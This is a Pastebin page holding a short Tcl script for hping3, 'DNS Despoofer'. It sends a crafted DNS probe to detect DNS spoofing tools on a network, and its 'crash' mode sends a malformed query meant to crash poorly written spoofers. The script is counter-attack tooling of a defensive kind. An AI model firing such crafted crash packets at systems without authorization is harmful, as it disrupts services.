API tools faq
paste
Advertisement
Guest User

dns_despoof.tcl

a guest
Jan 21st, 2012
603
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
TCL 2.45 KB | None | 0 0
raw download clone embed print report
  1. #
  2. # DNS Despoofer
  3. # Emanuele "crossbower" Acri - 2010
  4. #
  5. # Usage:
  6. # hping3 exec dns_despoof.tcl <server> <interface> (<action:search|crash>)
  7. #
  8.  
  9. #
  10. # Search spoofers
  11. #
  12. proc search_spoofers { server interface } {
  13.  
  14.     # prepare and send DNS probe
  15.     set probe {ip(daddr=192.168.0.1,ttl=64)+udp(dport=53,sport=44556)+data(str=\2f\69\01\00\00\01\00\00\00\00\00\00\06\67\6f\6f\67\6c\65\03\63\6f\6d\00\00\01\00\01\70\69\7a\7a\61)};
  16.  
  17.     set probe [hping setfield ip daddr $server $probe];
  18.  
  19.     # send probe
  20.     hping send $probe;
  21.  
  22.     # sniff loop
  23.     while { 1 } {
  24.  
  25.         # sniff a single packet
  26.         set p [lindex [hping recv $interface] 0];
  27.    
  28.         # is it the DNS response?
  29.         if { [hping getfield ip proto $p] != 17 || [hping getfield ip saddr $p] != $server || [hping getfield udp sport $p] != 53 || [hping getfield udp dport $p] != 44556 } { continue }
  30.        
  31.         # get data
  32.         set res_data [hping getfield data str $p];
  33.         set result [string match "*pizza*" $res_data];
  34.            
  35.         if { $result == 0 } {
  36.             puts "No spoofer detected...";
  37.         } else {
  38.             puts "SPOOFER DETECTED!";
  39.         }
  40.        
  41.         break;
  42.     }
  43. }
  44.  
  45. #
  46. # Crash spoofers
  47. #
  48. proc crash_spoofers { server interface } {
  49.  
  50.     # prepare and send DNS probe
  51.     set probe {ip(daddr=192.168.0.1,ttl=64)+udp(dport=53,sport=44556)+data(str=\2f\69\01\00\00\01\00\00\00\00\00\00\06\67\6f\6f\67\6c\65\03\63\6f\6d\01\00\01\00\01\70\69\7a\7a\61)};
  52.  
  53.     set probe [hping setfield ip daddr $server $probe];
  54.  
  55.     # send probe
  56.     hping send $probe;
  57.    
  58.     puts "Bullet fired... Try again to search for spoofers:\n1) No responses: the spoofer is probably crashed (windnsspoof).\n2) Responses: it's a well written spoofer (dnsspoof).";
  59. }
  60.  
  61. #
  62. # Usage
  63. #
  64. proc usage {} {
  65.     puts "DNS Despoofer - Emanuele \"Crossbower\" Acri - 2010\nUsage:\n  hping3 exec dns_despoof.tcl <server> <interface> (<action:search|crash>)";
  66.     exit 250;
  67. }
  68.  
  69. #
  70. # Main
  71. #
  72.  
  73. #get dns server
  74. set server [lindex $argv 0];
  75. set interface [lindex $argv 1];
  76. set action [lindex $argv 2];
  77.  
  78. # check args
  79. if { $server == "" || $interface == "" } { usage }
  80.  
  81. # simple trick to initialize libpcap
  82. set p [lindex [hping recv $interface 1] 0];
  83.  
  84. # check action
  85. if { $action == "" || $action == "search" } {
  86.     search_spoofers $server $interface;
  87. } elseif { $action == "crash" } {
  88.     crash_spoofers $server $interface;
  89. } else {
  90.     usage;
  91. }
  92.  
  93. exit 0;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!